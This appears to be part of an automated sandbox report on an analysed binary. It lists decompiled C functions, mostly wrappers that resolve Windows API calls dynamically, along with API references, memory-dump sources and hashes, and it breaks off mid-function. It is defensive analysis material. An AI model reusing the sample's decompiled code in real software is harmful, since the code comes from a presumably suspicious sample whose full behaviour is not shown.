                                                                                                                              • String ID: api-ms-
                                                                                                                              • API String ID: 3177248105-2084034818
                                                                                                                              • Opcode ID: 00280637e71eed8b2ab00236b0966d37d808c7af4e0ffa2c3c81ef8af9286992
                                                                                                                              • Instruction ID: 464990e7159fd0a45d190e56aeb2816eed0ff7ea750a85cd0aaf7065c8fd0de7
                                                                                                                              • Opcode Fuzzy Hash: 00280637e71eed8b2ab00236b0966d37d808c7af4e0ffa2c3c81ef8af9286992
                                                                                                                              • Instruction Fuzzy Hash: 34E04831298204BBEF112BA1DC07F197A589B04B55F24C421FD4CE42E6D7B1D8219754
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004197AD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 89%
                                                                                                                              			E004197AD(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				char _v0;
				struct HINSTANCE__* _t15;
				void* _t17;
				signed int _t25;
				void* _t28;
				intOrPtr _t33;
				void* _t37;

				_t28 = __ecx;
				if(_a8 <= 0xffff) {
					_push("GetProcAddress");
					_t15 = GetModuleHandleA("kernel32.dll");
					_push(_t15);
					L1();
					if(_t15 != 0) {
						goto __eax;
					}
					SetLastError(0x7f);
					return 0;
				} else {
					_t33 = _a4;
					if(_t33 == 0 || _a4 == 0) {
						L7:
						_t17 = 0;
					} else {
						_t37 = E00419269(_t33, 0,  &_v0);
						if(_t37 == 0) {
							goto L7;
						} else {
							_t25 = E004191EC(_t28, _a4,  *((intOrPtr*)(_t37 + 0x18)), _t33,  *((intOrPtr*)(_t37 + 0x20)) + _t33,  *((intOrPtr*)(_t37 + 0x24)) + _t33) & 0x0000ffff;
							if(_t25 >=  *((intOrPtr*)(_t37 + 0x14))) {
								goto L7;
							} else {
								_t17 =  *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x1c)) + _t25 * 4 + _t33)) + _t33;
								if(_t17 > _t37 && _t17 < _v0 + _t37) {
									goto L7;
								}
							}
						}
					}
					return _t17;
				}
			}










                                                                                                                              0x004197ad
                                                                                                                              0x004197b9
                                                                                                                              0x004197c1
                                                                                                                              0x004197cb
                                                                                                                              0x004197d1
                                                                                                                              0x004197d2
                                                                                                                              0x004197d9
                                                                                                                              0x004197dc
                                                                                                                              0x004197dc
                                                                                                                              0x004197e0
                                                                                                                              0x004197e9
                                                                                                                              0x004197bb
                                                                                                                              0x00419315
                                                                                                                              0x0041931a
                                                                                                                              0x0041936c
                                                                                                                              0x0041936c
                                                                                                                              0x00419322
                                                                                                                              0x0041932e
                                                                                                                              0x00419332
                                                                                                                              0x00000000
                                                                                                                              0x00419334
                                                                                                                              0x0041934c
                                                                                                                              0x00419352
                                                                                                                              0x00000000
                                                                                                                              0x00419354
                                                                                                                              0x0041935d
                                                                                                                              0x00419361
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00419361
                                                                                                                              0x00419352
                                                                                                                              0x00419332
                                                                                                                              0x00419371
                                                                                                                              0x00419371

                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetProcAddress), ref: 004197CB
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule
                                                                                                                              • String ID: GetProcAddress$kernel32.dll
                                                                                                                              • API String ID: 4139908857-1584408056
                                                                                                                              • Opcode ID: 104490f37a6416209e3d6b519b943211b67b4cf0a26ea0bcb918d4fc929ed6d5
                                                                                                                              • Instruction ID: 76c991397e847320d3ad01fc3efcb7a0ea1af2c1652c28ea793bc18f387134a0
                                                                                                                              • Opcode Fuzzy Hash: 104490f37a6416209e3d6b519b943211b67b4cf0a26ea0bcb918d4fc929ed6d5
                                                                                                                              • Instruction Fuzzy Hash: 31D0C23128820DE6A2102EA12A09B7736985F08711F240033FA24C98C1C5BCEC95C969
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00419843 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00419843(void* __eflags) {
				void* _t4;

				if(E0041930E(_t4, GetModuleHandleA("kernel32.dll"), "lstrlenW") != 0) {
					goto __eax;
				}
				SetLastError(0x7f);
				return 0;
			}




                                                                                                                              0x00419860
                                                                                                                              0x00419863
                                                                                                                              0x00419863
                                                                                                                              0x00419867
                                                                                                                              0x00419870

                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,lstrlenW), ref: 00419852
                                                                                                                              • SetLastError.KERNEL32(0000007F), ref: 00419867
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorHandleLastModule
                                                                                                                              • String ID: kernel32.dll$lstrlenW
                                                                                                                              • API String ID: 4242514867-1353037567
                                                                                                                              • Opcode ID: 7d71afc2f3eb8e43bd0ad7ef3576bc16eda1ddbe47e3ec1f3ebd8b605c301f13
                                                                                                                              • Instruction ID: 33da5c35d0298f5a1418e10d68eec351b2e8c62934b16e5e49d1031df397b0c6
                                                                                                                              • Opcode Fuzzy Hash: 7d71afc2f3eb8e43bd0ad7ef3576bc16eda1ddbe47e3ec1f3ebd8b605c301f13
                                                                                                                              • Instruction Fuzzy Hash: EBD0A731288208A691042BE25D09F37366C8B58B21B201432F704C9081D898D800C43D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00419873 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00419873(void* __eflags) {
				void* _t4;

				if(E0041930E(_t4, GetModuleHandleA("kernel32.dll"), "MultiByteToWideChar") != 0) {
					goto __eax;
				}
				SetLastError(0x7f);
				return 0;
			}




                                                                                                                              0x00419890
                                                                                                                              0x00419893
                                                                                                                              0x00419893
                                                                                                                              0x00419897
                                                                                                                              0x004198a0

                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,MultiByteToWideChar), ref: 00419882
                                                                                                                              • SetLastError.KERNEL32(0000007F), ref: 00419897
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorHandleLastModule
                                                                                                                              • String ID: MultiByteToWideChar$kernel32.dll
                                                                                                                              • API String ID: 4242514867-2998143648
                                                                                                                              • Opcode ID: 3013320aca61805c0d7a28cadd46bc6566c238f0ae6bdc3ffcb0b09952fd3cbe
                                                                                                                              • Instruction ID: 41e9a6fe04873f60e012af3f72e3c1fbcfe67b7d39dde0e7688f986ab9a5ca39
                                                                                                                              • Opcode Fuzzy Hash: 3013320aca61805c0d7a28cadd46bc6566c238f0ae6bdc3ffcb0b09952fd3cbe
                                                                                                                              • Instruction Fuzzy Hash: D0D0A7312C8308B691042BE21D09F3736688B98712B241062FB04C9081D998D904C579
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004198E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E004198E0(void* __eflags) {
				void* _t4;

				if(E0041930E(_t4, GetModuleHandleA("user32.dll"), "EnableWindow") != 0) {
					goto __eax;
				}
				SetLastError(0x7f);
				return 0;
			}




                                                                                                                              0x004198fd
                                                                                                                              0x00419900
                                                                                                                              0x00419900
                                                                                                                              0x00419904
                                                                                                                              0x0041990d

                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(user32.dll,EnableWindow), ref: 004198EF
                                                                                                                              • SetLastError.KERNEL32(0000007F), ref: 00419904
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorHandleLastModule
                                                                                                                              • String ID: EnableWindow$user32.dll
                                                                                                                              • API String ID: 4242514867-3997090522
                                                                                                                              • Opcode ID: 6839e60f39726a85f841fbd8a0298dd0f7bb3a738468bf27a2a8f54be9d54d28
                                                                                                                              • Instruction ID: 5274c8665ed7fadd965f58a4592c3555bf5a5f383ac7db9937cf6e532c8e4945
                                                                                                                              • Opcode Fuzzy Hash: 6839e60f39726a85f841fbd8a0298dd0f7bb3a738468bf27a2a8f54be9d54d28
                                                                                                                              • Instruction Fuzzy Hash: E5D0A7B1298309B691042BE21D0AF3B765C8B58711B151062F750C5180D8DCD854C52C
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004198A3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E004198A3(void* __eflags) {
				void* _t4;

				if(E0041930E(_t4, GetModuleHandleA("kernel32.dll"), "WideCharToMultiByte") != 0) {
					goto __eax;
				}
				SetLastError(0x7f);
				return 0;
			}




                                                                                                                              0x004198c0
                                                                                                                              0x004198c3
                                                                                                                              0x004198c3
                                                                                                                              0x004198c7
                                                                                                                              0x004198d0

                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,WideCharToMultiByte), ref: 004198B2
                                                                                                                              • SetLastError.KERNEL32(0000007F), ref: 004198C7
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorHandleLastModule
                                                                                                                              • String ID: WideCharToMultiByte$kernel32.dll
                                                                                                                              • API String ID: 4242514867-992036916
                                                                                                                              • Opcode ID: ddeac97d3f3f08afec6cc9a553dc38517c82d35c1f4f7a1317280e0b84bb19a3
                                                                                                                              • Instruction ID: e4fd9940e406f56f59de9e98546ba048967ca1caa51c0c46057c470193f20dac
                                                                                                                              • Opcode Fuzzy Hash: ddeac97d3f3f08afec6cc9a553dc38517c82d35c1f4f7a1317280e0b84bb19a3
                                                                                                                              • Instruction Fuzzy Hash: F0D0A731298309A6D2142BE25D09F77366C8B98B11F201022F714C5082D898D815C439
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00419910 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00419910(void* __eflags) {
				void* _t4;

				if(E0041930E(_t4, GetModuleHandleA("user32.dll"), "MessageBoxW") != 0) {
					goto __eax;
				}
				SetLastError(0x7f);
				return 0;
			}




                                                                                                                              0x0041992d
                                                                                                                              0x00419930
                                                                                                                              0x00419930
                                                                                                                              0x00419934
                                                                                                                              0x0041993d

                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(user32.dll,MessageBoxW), ref: 0041991F
                                                                                                                              • SetLastError.KERNEL32(0000007F), ref: 00419934
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorHandleLastModule
                                                                                                                              • String ID: MessageBoxW$user32.dll
                                                                                                                              • API String ID: 4242514867-436566834
                                                                                                                              • Opcode ID: 37cbe1d903e648c799e149c100e033a550cba30cbbf60199e638bef0c9ac99dd
                                                                                                                              • Instruction ID: 56e4c93e2e1f8dde42bcabebc9637868066cd7389f833eb02e16f57f0778c496
                                                                                                                              • Opcode Fuzzy Hash: 37cbe1d903e648c799e149c100e033a550cba30cbbf60199e638bef0c9ac99dd
                                                                                                                              • Instruction Fuzzy Hash: 88D0A9B22C8209BA92042BF2AE0AB3B37A88B48B21F211462FB01C5191D9DCE840C42D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00419741 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00419741(void* __eflags) {
				void* _t4;

				if(E0041930E(_t4, GetModuleHandleA("kernel32.dll"), "GetCPInfo") != 0) {
					goto __eax;
				}
				SetLastError(0x7f);
				return 0;
			}




                                                                                                                              0x0041975e
                                                                                                                              0x00419761
                                                                                                                              0x00419761
                                                                                                                              0x00419765
                                                                                                                              0x0041976e

                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetCPInfo), ref: 00419750
                                                                                                                              • SetLastError.KERNEL32(0000007F), ref: 00419765
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorHandleLastModule
                                                                                                                              • String ID: GetCPInfo$kernel32.dll
                                                                                                                              • API String ID: 4242514867-4020370742
                                                                                                                              • Opcode ID: ff2939ae1f93d14a6a5a6d6b486bf90a24fef25a74b22c505de7cafcee1bbbd2
                                                                                                                              • Instruction ID: 1a578e1b0ff7f821357e0da92404ad9a3544502c8db38b082cd0b29fc2900009
                                                                                                                              • Opcode Fuzzy Hash: ff2939ae1f93d14a6a5a6d6b486bf90a24fef25a74b22c505de7cafcee1bbbd2
                                                                                                                              • Instruction Fuzzy Hash: 04D0A731288308A6A1043BE21E0DF37365C8B58B11B201022F714C5081D89CE804C56D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041977C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E0041977C(void* __eflags) {
				signed int _t2;
				void* _t4;

				_t2 = E0041930E(_t4, GetModuleHandleA("kernel32.dll"), "GetFileAttributesW");
				if(_t2 != 0) {
					goto __eax;
				}
				SetLastError(0x7f);
				return _t2 | 0xffffffff;
			}





                                                                                                                              0x00419792
                                                                                                                              0x00419799
                                                                                                                              0x0041979c
                                                                                                                              0x0041979c
                                                                                                                              0x004197a0
                                                                                                                              0x004197aa

                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetFileAttributesW), ref: 0041978B
                                                                                                                              • SetLastError.KERNEL32(0000007F), ref: 004197A0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorHandleLastModule
                                                                                                                              • String ID: GetFileAttributesW$kernel32.dll
                                                                                                                              • API String ID: 4242514867-3967345162
                                                                                                                              • Opcode ID: 904bf2db6c4cea6432c9f576140b2331afcabf9f4d58d76ecd80ed7b798ae873
                                                                                                                              • Instruction ID: 6a2c39cffd35b218101dc8dcb2abb0ba254f2a54b5007d9904b26448b9f3ed53
                                                                                                                              • Opcode Fuzzy Hash: 904bf2db6c4cea6432c9f576140b2331afcabf9f4d58d76ecd80ed7b798ae873
                                                                                                                              • Instruction Fuzzy Hash: 5FD0A731188308B291042AA61E0AB373A588E44B31B301622F734C51C1C9A8D840C42D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004197F9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E004197F9(void* __eflags) {
				void* _t4;

				if(E0041930E(_t4, GetModuleHandleA("kernel32.dll"), "IsValidCodePage") != 0) {
					goto __eax;
				}
				SetLastError(0x7f);
				return 0;
			}




                                                                                                                              0x00419816
                                                                                                                              0x00419819
                                                                                                                              0x00419819
                                                                                                                              0x0041981d
                                                                                                                              0x00419826

                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,IsValidCodePage), ref: 00419808
                                                                                                                              • SetLastError.KERNEL32(0000007F), ref: 0041981D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorHandleLastModule
                                                                                                                              • String ID: IsValidCodePage$kernel32.dll
                                                                                                                              • API String ID: 4242514867-1070563503
                                                                                                                              • Opcode ID: ec7066d6319b490f5f53a30e087f4efd31a18140c456cfcfed979578ac2c965a
                                                                                                                              • Instruction ID: 5eb85c449d3b6d8685182a1ee8a45939177a909bfb8ccab85e7ef4fcb9329313
                                                                                                                              • Opcode Fuzzy Hash: ec7066d6319b490f5f53a30e087f4efd31a18140c456cfcfed979578ac2c965a
                                                                                                                              • Instruction Fuzzy Hash: 54D0A7312883086691042BE21D0DF3736688B59B11B201032F704C5082D998E800C42D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004234ED Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 65%
                                                                                                                              			E004234ED() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x434e48;
					_v28 =  *0x434e40;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}







                                                                                                                              0x004234f2
                                                                                                                              0x004234fa
                                                                                                                              0x00423511
                                                                                                                              0x004234bd
                                                                                                                              0x004234c6
                                                                                                                              0x004234d2
                                                                                                                              0x004234d5
                                                                                                                              0x004234d8
                                                                                                                              0x004234da
                                                                                                                              0x004234dd
                                                                                                                              0x004234e2
                                                                                                                              0x004234ec
                                                                                                                              0x004234e4
                                                                                                                              0x004234e8
                                                                                                                              0x004234e8
                                                                                                                              0x004234fc
                                                                                                                              0x00423502
                                                                                                                              0x0042350a
                                                                                                                              0x00000000
                                                                                                                              0x0042350c
                                                                                                                              0x0042350c
                                                                                                                              0x00423510
                                                                                                                              0x00423510
                                                                                                                              0x0042350a

                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(KERNEL32,0041BBC7), ref: 004234F2
                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00423502
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                              • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                              • API String ID: 1646373207-3105848591
                                                                                                                              • Opcode ID: d1422fd283a4643f473ebbd1c8bb5104d0b5c130e6e4e35e2813be2c714071a5
                                                                                                                              • Instruction ID: 795098caabf5a7a9f1e7cec0483dae6a25e6a235b90156e5c221ba71acb95d5f
                                                                                                                              • Opcode Fuzzy Hash: d1422fd283a4643f473ebbd1c8bb5104d0b5c130e6e4e35e2813be2c714071a5
                                                                                                                              • Instruction Fuzzy Hash: 5FC0122074432161DE202FF12C0A75722286B84B03F5014927609D1080CB5CD706942D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040B250 Relevance: 6.4, APIs: 4, Instructions: 361memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 48%
                                                                                                                              			E0040B250(intOrPtr __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t168;
				char _t173;
				intOrPtr _t174;
				intOrPtr _t177;
				void* _t179;
				char _t181;
				intOrPtr* _t188;
				intOrPtr* _t199;
				intOrPtr _t202;
				void* _t204;
				intOrPtr* _t211;
				intOrPtr* _t221;
				void* _t232;
				intOrPtr _t233;
				intOrPtr* _t235;
				char _t244;
				intOrPtr _t245;
				intOrPtr _t246;
				intOrPtr _t247;
				intOrPtr _t249;
				intOrPtr _t254;
				intOrPtr _t256;
				char _t263;
				char _t267;
				intOrPtr _t268;
				char _t273;
				char _t278;
				intOrPtr* _t282;
				intOrPtr _t288;
				intOrPtr _t291;
				intOrPtr _t296;
				intOrPtr _t299;
				intOrPtr _t303;
				intOrPtr _t305;
				intOrPtr _t306;
				intOrPtr _t307;
				intOrPtr* _t308;
				intOrPtr* _t309;
				intOrPtr _t317;
				void* _t320;
				signed int _t321;
				intOrPtr* _t322;
				intOrPtr _t323;
				intOrPtr* _t325;
				intOrPtr* _t326;
				void* _t333;
				intOrPtr _t339;
				intOrPtr _t341;
				intOrPtr _t342;
				void* _t343;
				signed int _t344;

				_push(0xffffffff);
				_push(E00430648);
				_push( *[fs:0x0]);
				_t344 = _t343 - 0x1c;
				_t168 =  *0x43a6a8; // 0x2a5cd135
				_push(_t168 ^ _t344);
				 *[fs:0x0] = _t344 + 0x30;
				_t339 = __ecx;
				_t244 = 0;
				 *((intOrPtr*)(_t344 + 0x24)) = 0;
				 *((intOrPtr*)(_t344 + 0x28)) = 0;
				 *((intOrPtr*)(_t344 + 0x2c)) = 0;
				 *((intOrPtr*)(_t344 + 0x38)) = 0;
				if( *((intOrPtr*)(_t344 + 0x4c)) == 0) {
					_t305 =  *((intOrPtr*)(__ecx + 0x18));
					__eflags =  *((intOrPtr*)(__ecx + 0x14)) - _t305;
					_t320 = __ecx + 0x10;
					if( *((intOrPtr*)(__ecx + 0x14)) > _t305) {
						E0041AD33();
					}
					_t245 =  *((intOrPtr*)(_t320 + 4));
					__eflags = _t245 -  *((intOrPtr*)(_t320 + 8));
					if(_t245 >  *((intOrPtr*)(_t320 + 8))) {
						E0041AD33();
					}
					_push( *((intOrPtr*)(_t344 + 0x4c)));
					E0040B080(_t344 + 0x34, _t320, _t245, _t320, _t305);
					_t244 = 0;
					__eflags = 0;
				} else {
					_t318 =  *((intOrPtr*)(__ecx + 8));
					if( *((intOrPtr*)(__ecx + 4)) >  *((intOrPtr*)(__ecx + 8))) {
						E0041AD33();
					}
					_t337 =  *((intOrPtr*)(_t339 + 4));
					if( *((intOrPtr*)(_t339 + 4)) >  *((intOrPtr*)(_t339 + 8))) {
						E0041AD33();
					}
					_push( *((intOrPtr*)(_t344 + 0x4c)));
					E0040B080(_t344 + 0x34, _t339, _t337, _t339, _t318);
				}
				_t321 = 0;
				while(1) {
